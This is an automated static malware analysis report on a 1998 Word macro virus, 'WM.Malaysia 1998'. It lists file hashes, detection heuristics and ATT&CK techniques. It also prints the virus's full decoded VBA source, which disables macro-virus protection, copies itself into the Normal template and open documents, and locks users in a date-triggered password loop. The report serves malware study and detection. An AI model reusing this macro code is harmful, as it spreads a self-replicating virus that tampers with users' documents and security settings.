Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebfdd92948c95b1a…

MALICIOUS

Office (OLE)

Size: 37.5 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 01ea304176ec425621a0b82c1ef1b364
SHA-1: 23b5a48acac0549a23c7ad623cb7b4ccc233e390
SHA-256: ebfdd92948c95b1a22a992176257590edd6417d4aa7be535f68da19f97bf38c7
Risk Score: 288

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro virus markers and VBA macros, including an AutoOpen subroutine, indicating malicious intent. The 'ToolsMacro' subroutine prompts the user for a password, which is a common social engineering tactic to bypass security measures or trick users into enabling malicious content. The presence of these elements strongly suggests the document is designed to deliver a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Trojan.Preteced-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Preteced-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2854 bytes
SHA-256: 3a6c223e193c3bfa63744fafdc3900c51dcf19e33b81daa2d4be79d0f3934b33
Detection
ClamAV: Doc.Trojan.Proteced-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Malaysia1998"

Sub AutoExec()

Options.VirusProtection = False

End Sub

Sub AutoOpen()

On Error GoTo err
Options.SaveNormalPrompt = False
DocumentToNormal
NormalTemplate.Save
err:

End Sub

Sub FileSave()

Application.EnableCancelKey = wdCancelDisabled
Trigger
On Error GoTo err
   NormalToDocument
   ActiveDocument.Save
err:
Application.EnableCancelKey = wdCancelInterrupt

End Sub

Sub FileSaveAs()
Attribute FileSaveAs.VB_Description = "Macro recorded 04/09/98 by Ng Bing Yew"
Attribute FileSaveAs.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.Macro2"

Application.EnableCancelKey = wdCancelDisabled
Trigger
On Error GoTo err
   NormalToDocument
   Dialogs(wdDialogFileSaveAs).Show
err:
Application.EnableCancelKey = wdCancelInterrupt

End Sub

Sub ToolsMacro()
   
Application.EnableCancelKey = wdCancelDisabled
   titles = "Macro Proteced"
   msg = "Please enter correct password in order to access the macro:"
   Passcode = InputBox(msg, titles)
   If Passcode = "Bad Logic" Then
      Dialogs(wdDialogToolsMacro).Show
   Else
      MsgBox ("Access denied...")
   End If
Application.EnableCancelKey = wdCancelDisabled
   
End Sub

Sub NormalToDocument()

On Error GoTo err
   cur_doc = ActiveDocument.FullName
   global_temp = NormalTemplate.FullName
   macroname = "Malaysia1998"
   Application.OrganizerCopy Source:=global_temp, _
   Destination:=cur_doc, Name:=macroname, _
   Object:=wdOrganizerObjectProjectItems
err:

End Sub

Sub DocumentToNormal()

On Error GoTo err
   cur_doc = ActiveDocument.FullName
   global_temp = NormalTemplate.FullName
   macroname = "Malaysia1998"
   Application.OrganizerCopy Source:=cur_doc, _
                             Destination:=global_temp, _
                             Name:=macroname, _
                             Object:=wdOrganizerObjectProjectItems
err:
   
End Sub

Sub Trigger()

On Error GoTo err
   Todaydate = Date
   If (Month(Todaydate) = 8) And (Day(Todaydate) = 30) Then
       Do
         cr = Chr(13) + Chr(10)
         titles = "WM.MALAYSIA 1998"
         msg1 = "You are lucky!!! You have met WM.MALAYSIA 1998!!!" + cr
         msg2 = "WM.MALAYSIA 1998 is Malaysian's first MACRO VIRUS." + cr
         msg3 = "It is written by a young college student -- BAD LOGIC." + cr
         msg4 = cr + cr + cr + cr + "Please ENTER CORRECT password: "
         msg = msg1 + msg2 + msg3 + msg4
         response = InputBox(msg, titles)
       Loop While (response <> "WM.MALAYSIA 1998")
    End If
err:

End Sub